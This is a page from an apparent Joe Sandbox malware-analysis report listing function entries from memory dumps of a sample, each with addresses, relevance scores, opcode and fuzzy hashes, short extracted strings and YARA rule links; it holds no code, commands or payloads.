                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0f88989f20f3bddf4e7e4a9cd6c71faa9537792b3c6b94977643f2188b13ac88
                                    • Instruction ID: 51f19eb4d065d9f8fd52e1614fdb4ed3752cfb293265992dd57c886c36d2135f
                                    • Opcode Fuzzy Hash: 0f88989f20f3bddf4e7e4a9cd6c71faa9537792b3c6b94977643f2188b13ac88
                                    • Instruction Fuzzy Hash: 2F119072D4850E9FE780EB68848A2FE7BF0FF58390F544576C428C7092EE38A444C751
                                    Function 00007FF887AE112D Relevance: .1, Instructions: 61COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cc9eee5b8cb02c7a353ec1add1ba0f118d0effee99a3db42e4694efdbd666456
                                    • Instruction ID: 576ce4c191c4a9190036193fe76c5fa9c95fac6ad4fe0e721dc75f86d27929dd
                                    • Opcode Fuzzy Hash: cc9eee5b8cb02c7a353ec1add1ba0f118d0effee99a3db42e4694efdbd666456
                                    • Instruction Fuzzy Hash: 3511E272D4865A8FEB99AB68C45A3FD7BF0FF65350F0404BEC00AC60D2DA395444C701
                                    Function 00007FF887AE0EFD Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf1535f5aee063b23da4d0ae971581a0959fec7910013df6422fcca129f03c6d
                                    • Instruction ID: c3e1406df8d7c1d7f573f2e35f54a880353181468682914b773937896c2220e2
                                    • Opcode Fuzzy Hash: bf1535f5aee063b23da4d0ae971581a0959fec7910013df6422fcca129f03c6d
                                    • Instruction Fuzzy Hash: 39114232E4890E8FEB54EB54C895BEF77B2FB54340F204675C01AD7295CE78A985CB80
                                    Function 00007FF887AE05D8 Relevance: .0, Instructions: 50COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dc16866b8ac916249fa9dbe058f8331b17d7a00d151e93757a1adc6af58265ee
                                    • Instruction ID: 20501ce91581f4ad9446876a17603f092cf2baf6d50f558f11fe365023dcf528
                                    • Opcode Fuzzy Hash: dc16866b8ac916249fa9dbe058f8331b17d7a00d151e93757a1adc6af58265ee
                                    • Instruction Fuzzy Hash: 6D019A3094991E8FDB88EF24C08A6BE77B1FF58348F2008BED41EC6191CE36A590CB40
                                    Function 00007FF887AE28CD Relevance: .0, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 92d86d8855e2c48e71445a7a466f18fc5c0a1b96d1cdbe603a27e35f48d3be50
                                    • Instruction ID: 47958406a54ff7beebadfc9c898db4c862c0c3dbfe13c50bb6ba2803b38f1911
                                    • Opcode Fuzzy Hash: 92d86d8855e2c48e71445a7a466f18fc5c0a1b96d1cdbe603a27e35f48d3be50
                                    • Instruction Fuzzy Hash: 05017C32D88A4D8FE751EB64849A6FD7BF0FF19340F4555B6E418C70A2EA38E584C741
                                    Function 00007FF887AE341A Relevance: .0, Instructions: 44COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8b625f1c0b8aa15692a3ba8acf1948bbc52a14af0087aa870e09dde02802b31e
                                    • Instruction ID: 737147f6bb7884e5fd6ee04ebf959b9a6c75ed20da2126e822a0d640737e1c37
                                    • Opcode Fuzzy Hash: 8b625f1c0b8aa15692a3ba8acf1948bbc52a14af0087aa870e09dde02802b31e
                                    • Instruction Fuzzy Hash: 17012836D4890E9EEB91EF68C8496BE7BF0FF18341F0449B6D41DC6091EA34A184CB41
                                    Function 00007FF887AE2F69 Relevance: .0, Instructions: 43COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b65c5285c60348134fc4939cd53ab762e037c6b83a996431c3a172cf783f95a2
                                    • Instruction ID: e3a0d62705abb3b4d2854f27c2ac4c61d254c1f5a2d9ad4dc892dcb2345cf213
                                    • Opcode Fuzzy Hash: b65c5285c60348134fc4939cd53ab762e037c6b83a996431c3a172cf783f95a2
                                    • Instruction Fuzzy Hash: E801843298DA898FE751AB74885A1AD7BF0FF55340F0508F6D408CB0E6EE38A494C701
                                    Function 00007FF887AE0610 Relevance: .0, Instructions: 42COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6ea57ec09263486b584ac9fcce3145f46f18462651162b16dadc9fadbdb6723a
                                    • Instruction ID: 001fb5854e27791b97cdcecfe121a9a4595e8c255f9b31d7fa0f58749c862ad4
                                    • Opcode Fuzzy Hash: 6ea57ec09263486b584ac9fcce3145f46f18462651162b16dadc9fadbdb6723a
                                    • Instruction Fuzzy Hash: 34018C3199890ECAEB58EB64C45A2BD73B0FF1834AF50087EE41EC61D1DF39A590CB01
                                    Function 00007FF887AE0608 Relevance: .0, Instructions: 42COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dc5adf7e1ac54dc9f58599e7f52da6a08065c22e9901b210683b58198e0a008f
                                    • Instruction ID: f671f2114f654b32e94118f76193c0df5614b351bde411ecb4eb43d200984b6c
                                    • Opcode Fuzzy Hash: dc5adf7e1ac54dc9f58599e7f52da6a08065c22e9901b210683b58198e0a008f
                                    • Instruction Fuzzy Hash: 79016931958A0E8FEB59EB64C45A2BE72B1FF18346F20087EE41EC61D1DF39A594C641
                                    Function 00007FF887AE1CFD Relevance: .0, Instructions: 41COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 09d86f4c905c6e681426d437988598493741232c4a2acbaec2c20fc0d422f3c1
                                    • Instruction ID: e25d6ca63c62f7b651183d25d0adfcbcaf91060f0f7ba691b400926a19729230
                                    • Opcode Fuzzy Hash: 09d86f4c905c6e681426d437988598493741232c4a2acbaec2c20fc0d422f3c1
                                    • Instruction Fuzzy Hash: 9001D17194A68D8FDB98DF24C4962FD3BB1FF15300F5404BAD40CC6192DA399990CB40
                                    Function 00007FF887AE1140 Relevance: .0, Instructions: 41COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f4064481e06cd8c0e1fd19082a1cf42c07b08c0a08280484dd7568081e270591
                                    • Instruction ID: 36f3a28f1ff96894432f145a36611b7079f66922a4fe17f91027d7122c46c191
                                    • Opcode Fuzzy Hash: f4064481e06cd8c0e1fd19082a1cf42c07b08c0a08280484dd7568081e270591
                                    • Instruction Fuzzy Hash: 45F0FF72D58A2E8AFB98AA68D84A3FE77F0FF55354F00007ED41EC20C0DE281014C241
                                    Function 00007FF887AE05D0 Relevance: .0, Instructions: 39COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fdffc54146626bdfbb1022121da3448554ee572ffb030ae7b2ca25da4474ad3
                                    • Instruction ID: f3e345226cd1fab6c5e2d4f1b9ebcc75046627def8943f87fc7bed2f227f4ad9
                                    • Opcode Fuzzy Hash: 2fdffc54146626bdfbb1022121da3448554ee572ffb030ae7b2ca25da4474ad3
                                    • Instruction Fuzzy Hash: E1F0CD3194A65E8FEB88EE24D4462FE37B0FF05348F10087AE80DC2081DA39A5A0CB81
                                    Function 00007FF887AE27E9 Relevance: .0, Instructions: 35COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 94beccc4637e030d9d8acfb34ec0cf2dfdcea2747bdab4b66645810700c99e3c
                                    • Instruction ID: 88f6a8ca15c7ee47e21769e0bbbd11bf896a32931f365d48c0a45b82cfe4f0ef
                                    • Opcode Fuzzy Hash: 94beccc4637e030d9d8acfb34ec0cf2dfdcea2747bdab4b66645810700c99e3c
                                    • Instruction Fuzzy Hash: 5AF0623284D7898FE75A9B2488552FD3BB0FF56301F4505BAD419C61D2DB3C9498C742
                                    Function 00007FF887AE285D Relevance: .0, Instructions: 33COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a8cbc7691ee7a46cb8178e750abb2b740b7931f7895b6685f91fa5d959ae2910
                                    • Instruction ID: aa2f5623482e80e80b2cc2016c328ed5cc7394051735dcfbbd55bcf81fdda194
                                    • Opcode Fuzzy Hash: a8cbc7691ee7a46cb8178e750abb2b740b7931f7895b6685f91fa5d959ae2910
                                    • Instruction Fuzzy Hash: 39F0BE32989A8ACFEB599F64885A2FD3BB0FF15306F4405BEE809C61D2DB3C9494C701
                                    Function 00007FF887AE3F66 Relevance: .0, Instructions: 18COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction ID: fdcbbb154cbc505fb9acf3d74233a7b667f0735ba7232d031203bfc19dcffc64
                                    • Opcode Fuzzy Hash: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction Fuzzy Hash: 7CE02271D1592D8FDBA4EB048855BAEB7B1BF89342F5015E9C44DE6280DA745EC0CF44

                                    Executed Functions

                                    Function 00007FF887B05AC0 Relevance: 20.0, Strings: 15, Instructions: 1255COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 6f$6f$6f$6f$6f$6f$6f$6f$6f$6f$0Dp$0Dp$0Dp$0Dp$p
                                    • API String ID: 0-224046022
                                    • Opcode ID: 290e3918a72bf63dbf407c4562120200d9b8e43585db9c9307ebecaa69adfc53
                                    • Instruction ID: a6816d01829aee7e36bea69a735135995c8171450c6c5314368b10e5b03d64f6
                                    • Opcode Fuzzy Hash: 290e3918a72bf63dbf407c4562120200d9b8e43585db9c9307ebecaa69adfc53
                                    • Instruction Fuzzy Hash: 66A2B73095891D8FDBA4EB58C895BA8B3F2FF69740F5045E9D00DE7292CA34AE81CF45
                                    Function 00007FF887AF35F5 Relevance: 7.7, Strings: 6, Instructions: 192COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "9f$r6f$r6f$r6f$r6f$L_H
                                    • API String ID: 0-1116992257
                                    • Opcode ID: 2501d0f2665cd560da897c913bc180af30406c04cf2001624f1b78e9a1aa35fa
                                    • Instruction ID: 200e467755c1bd9133c33853bd5968cd1d6460a2aa3ee4b7723874a0d5301f7b
                                    • Opcode Fuzzy Hash: 2501d0f2665cd560da897c913bc180af30406c04cf2001624f1b78e9a1aa35fa
                                    • Instruction Fuzzy Hash: FB61CD72D1894E8FEB98DB68C8567ED7BF0FF5A380F4401B9C00DC7296DA686841CB42
                                    Function 00007FF887B0FF09 Relevance: 5.5, Strings: 4, Instructions: 533COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: AK_^$BK_^$CK_^$DK_^
                                    • API String ID: 0-615811481
                                    • Opcode ID: 34304b74704b62007a2bdcc872c18812836dc4f4de3032e3ab630bbbcd50b5e9
                                    • Instruction ID: f7f81c7c87bd802c8e6740cca1eef6667d08f7e4825fc235c7fa6e7bdf5f6cff
                                    • Opcode Fuzzy Hash: 34304b74704b62007a2bdcc872c18812836dc4f4de3032e3ab630bbbcd50b5e9
                                    • Instruction Fuzzy Hash: DC02B82290D19A6FD701FBACA8A55ED3FB0FF022A9B1801B7D48CCE193DD1C6549C256
                                    Function 00007FF887B05A81 Relevance: 5.5, Strings: 4, Instructions: 532COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (0i$(0i$EY_H$r6f
                                    • API String ID: 0-901057379
                                    • Opcode ID: 9f00c03bf758985252b343e7b080e361bfc17d1ae9971cb997ca96b9f3669036
                                    • Instruction ID: 6f9ff2dce3a0d52ddbef2633a91dfb2191cebeb70723004d17d70472f0a6a759
                                    • Opcode Fuzzy Hash: 9f00c03bf758985252b343e7b080e361bfc17d1ae9971cb997ca96b9f3669036
                                    • Instruction Fuzzy Hash: 57E1E631B5CD4E4FEB99DA6C9494AB973E2FFA835070402BAD44EC7596DD28EC46C380
                                    Function 00007FF887B0DF32 Relevance: 4.1, Strings: 3, Instructions: 330COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f$r6f$r6f
                                    • API String ID: 0-1902842539
                                    • Opcode ID: 8805cc49e7fd8588fc1115a807dc4b6bc7bb7e4074abde9985118221a2bb737b
                                    • Instruction ID: 600864882f36c3a8839b44ba847ac625906c32ae415449dbef7b9a72030ecb4e
                                    • Opcode Fuzzy Hash: 8805cc49e7fd8588fc1115a807dc4b6bc7bb7e4074abde9985118221a2bb737b
                                    • Instruction Fuzzy Hash: C3C1B530A5CA469FE749EB28C0916B8B7B2FF59350F5441BDC04EC7A96DB28B851CB81
                                    Function 00007FF887B12FA2 Relevance: 4.1, Strings: 3, Instructions: 320COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f$r6f$r6f
                                    • API String ID: 0-1902842539
                                    • Opcode ID: 075c33da2cfdc9df683be72256da06b2b9c36a04f065c0b8d5b4ffbc391e1339
                                    • Instruction ID: c786e3417ee70e52309e3061044956d3999d9a818d34b7da2f309a3bd992b7d0
                                    • Opcode Fuzzy Hash: 075c33da2cfdc9df683be72256da06b2b9c36a04f065c0b8d5b4ffbc391e1339
                                    • Instruction Fuzzy Hash: 7CC1B630A4CA469FE749DB68C0916A8B7F2FF59340F5441B9C44EC7A86DB38F851CBA1
                                    Function 00007FF887B0CAFA Relevance: 3.8, Strings: 3, Instructions: 92COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f$r6f$S<
                                    • API String ID: 0-3509035312
                                    • Opcode ID: 3c655d9bdeb8c60755428dca2d4d6e98b56c979ae833f65d840d58d02e80eb24
                                    • Instruction ID: 167087687ef63404579132bf23d5d99b7e916a8c0d1937c69911fd0bb1362593
                                    • Opcode Fuzzy Hash: 3c655d9bdeb8c60755428dca2d4d6e98b56c979ae833f65d840d58d02e80eb24
                                    • Instruction Fuzzy Hash: 8E218031E5CA4E4FE798A76858512ECB7F2FF59351F44027AE00DD3282DE586845C691
                                    Function 00007FF887B011BE Relevance: 3.8, Strings: 3, Instructions: 46COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "$,$/
                                    • API String ID: 0-958255211
                                    • Opcode ID: 58ca81bcd11663c841533415b61b6d21ac4316102006df1217842632dbbc67ef
                                    • Instruction ID: 3267beaf49a22a822bf0d98cba3a9285b3f43a246ec99e3ce2e1dfa47b5f880c
                                    • Opcode Fuzzy Hash: 58ca81bcd11663c841533415b61b6d21ac4316102006df1217842632dbbc67ef
                                    • Instruction Fuzzy Hash: 64119370C4862DCFDB68DF54C8887EDB3B2BB58341F0051A9D04DAB291DB786A88DF40
                                    Function 00007FF887B0C1B1 Relevance: 3.2, Strings: 2, Instructions: 676COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0#p$p]p
                                    • API String ID: 0-1779973091
                                    • Opcode ID: 9fd4ee4d882c8e3f17cbb67013b136bebac5294bdb7cd155b435c83b55aed3ac
                                    • Instruction ID: 7aea952d00e5b7f88d99131a2b38ba04c29d204f3c33140459a4ed00ab9daa25
                                    • Opcode Fuzzy Hash: 9fd4ee4d882c8e3f17cbb67013b136bebac5294bdb7cd155b435c83b55aed3ac
                                    • Instruction Fuzzy Hash: AD227E30A58A198FDB98DB18C895ABD73F2FF98350B5441B9D00ED7292DF24EC46CB81
                                    Function 00007FF887B104A1 Relevance: 3.0, Strings: 2, Instructions: 453COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: c$p]p
                                    • API String ID: 0-3558418754
                                    • Opcode ID: 0771c11724e2b3284453b361d09c8131063c06d1057b3dcc4f1910a16b24cdfd
                                    • Instruction ID: 3b7df15aa42e2105fe2298bd535abb5509a0644cb6f4a6fb0100e95ab1ff180e
                                    • Opcode Fuzzy Hash: 0771c11724e2b3284453b361d09c8131063c06d1057b3dcc4f1910a16b24cdfd
                                    • Instruction Fuzzy Hash: 08D14D31A4C9498FE768DB1CD4556BD37E2FF98350F1402B9D06EC7592DE28AC06CB91
                                    Function 00007FF887B0E408 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $r6f
                                    • API String ID: 0-2773680984
                                    • Opcode ID: b7b353fc57dd311038f590edeb8f9918ddf5efe26e08131d5df5ce41b8aea57a
                                    • Instruction ID: 09883123503b7fe0b40241e9ec6a7e19d2a241e5c90600cc7c06ea08b5a3bd28
                                    • Opcode Fuzzy Hash: b7b353fc57dd311038f590edeb8f9918ddf5efe26e08131d5df5ce41b8aea57a
                                    • Instruction Fuzzy Hash: 75514C71D4860E9FEB59EBA8D4546FDBBB2FF48340F1045BAC00AE7292DA386905CB51
                                    Function 00007FF887B13478 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $r6f
                                    • API String ID: 0-2773680984
                                    • Opcode ID: 17380a7fe8852f8e7f83ec8a2b529d4cc5f9a60a93c20237d9dba1cb8616d0d9
                                    • Instruction ID: 2d6b2b878c320e64c932033415b320ec71859234a548fb33a6965023e9949b76
                                    • Opcode Fuzzy Hash: 17380a7fe8852f8e7f83ec8a2b529d4cc5f9a60a93c20237d9dba1cb8616d0d9
                                    • Instruction Fuzzy Hash: 80514C71D4854A9FEB49DBA8D8655FDBBB2FF44340F1440BAC00EE7282DE39A905CB51
                                    Function 00007FF887B11EEB Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f$r6f
                                    • API String ID: 0-3010028659
                                    • Opcode ID: 2034aba98a22580123a442a6ac5817e72f8e37cae1c9f38c0018ca2142330c25
                                    • Instruction ID: a7976ba094f8ce89160da5e1e8c43f6a43a876a867d7b899910681b644facc0c
                                    • Opcode Fuzzy Hash: 2034aba98a22580123a442a6ac5817e72f8e37cae1c9f38c0018ca2142330c25
                                    • Instruction Fuzzy Hash: 52312D71A5894A8FDB58DB58D4919ACB7B2FF58350B148239D01ED3282DF28BC52CB90
                                    Function 00007FF887B0BA42 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f$S<
                                    • API String ID: 0-78569100
                                    • Opcode ID: 1169694e72cfa691e28974db9a60e9ff51484f42c217f9725f829e02466fc83e
                                    • Instruction ID: cc6dc27f8a7ca3b690f567eaf02f5a78138bb432881eeff1c1892610c40e9edd
                                    • Opcode Fuzzy Hash: 1169694e72cfa691e28974db9a60e9ff51484f42c217f9725f829e02466fc83e
                                    • Instruction Fuzzy Hash: C121E431E5891D9FDF99DB58C8A5AEDB7B2FB68304F4041AAD00EE3291CE34A951CF40
                                    Function 00007FF887B07C24 Relevance: 2.6, Strings: 2, Instructions: 53COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8ep$SP_H
                                    • API String ID: 0-3501953146
                                    • Opcode ID: 4efb3dd4aad3bc976dc93b7f522495fed9ac262b660364c4e1a3e9713433dd60
                                    • Instruction ID: 747f9de9b183cc46b8d5c8917e1872fb50cb89c60dc3e517b8e28e7e4abe5cde
                                    • Opcode Fuzzy Hash: 4efb3dd4aad3bc976dc93b7f522495fed9ac262b660364c4e1a3e9713433dd60
                                    • Instruction Fuzzy Hash: 75018C71D1890D9FDB44EFA8D885AEEBBF1FF54310F50012AE408E3291CB346846CB80
                                    Function 00007FF887B136EF Relevance: 1.6, Strings: 1, Instructions: 362COMMON
